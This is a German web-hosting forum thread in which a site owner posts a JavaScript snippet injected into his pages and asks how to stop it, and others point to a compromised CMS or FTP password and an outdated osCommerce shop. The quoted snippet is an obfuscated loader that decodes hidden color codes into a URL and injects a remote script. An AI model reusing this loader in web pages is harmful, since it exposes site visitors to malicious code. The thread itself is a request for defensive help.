Abuse Angriffe auf verschiedene Seiten

Dieses Thema im Forum "Server Administration" wurde erstellt von Falloutboy6, 30. Okt. 2012.

  1. Falloutboy6

    Falloutboy6 Member

    Hallo,

    ich habe zur Zeit das Problem, dass ich einige Abuse Angriffe habe. Es steht jedesmal folgender Code auf einmal in der Seite

    Code:
    <script type="text/javascript">
    if (typeof(redef_colors)=="undefined") {
    
       var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e4745', '#3d4444', '#3d4043', '#3f3d41', '#3f423e', '#79823e', '#798084', '#748188', '#3d7c78', '#7d3d7f', '#777f31', '#4d0000');
       var redef_colors = 1;
       var colors_picked = 0;
    
       function div_pick_colors(t,styled) {
            var s = "";
            for (j=0;j<t.length;j++) {      
                    var c_rgb = t[j];
                    for (i=1;i<7;i++) {
                            var c_clr = c_rgb.substr(i++,2);
                            if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
                    }
            }
            if (styled) {
                    s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
            } else {
                    s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
            }
            return s;
       }
    
       function try_pick_colors() {
            try {
                    if(!document.getElementById || !document.createElement){
                            document.write(div_pick_colors(div_colors,1));
                       } else {
                            var new_cstyle=document.createElement("script");
                            new_cstyle.type="text/javascript";
                            new_cstyle.src=div_pick_colors(div_colors,0);
                            document.getElementsByTagName("head")[0].appendChild(new_cstyle);
                    }
            } catch(e) { }
            try {
                    check_colors_picked();
            } catch(e) { 
                    setTimeout("try_pick_colors()", 500);
            }
       }
    
       try_pick_colors();
    
    }
    </script>
    Kann mir jemand sagen wie ich das verhindern kann?

    Es läuft bei mir aktuell ISPConfig Version: 2.2.38.

    Vielen Dank für alle Tipps.

    Gruß
    Benny
     
  2. Till

    Till Administrator

    Erstmal musst Du rausinden wie die Angriffe passieren, also ob das in der Seite installirte CMS gehackt wurde oder ob der Angreifer an das FTP Passwort gekommen ist. Wenn der Angriff über ein ausgespähtes FTP Passwort passiert ist, dann musst Du dazu FTP Logins im log finden. Welche CMS Systeme und Versionen kommen denn in den Seiten zum Einsatz?
     
  3. juergen71

    juergen71 Member

    du hast da wohl eine alte version von oscommerce in verwendung, in verbindung mit falsch gesetzten file permissions.
    den shop kannst du offline nehmen, die werden dir das immer wieder reinlegen.

    hier ist übrigens ein thread dazu in welchem auch lösungen diskutiert werden:

    Hacked webshop! - General Support - osCommerce Support Forum
     

Diese Seite empfehlen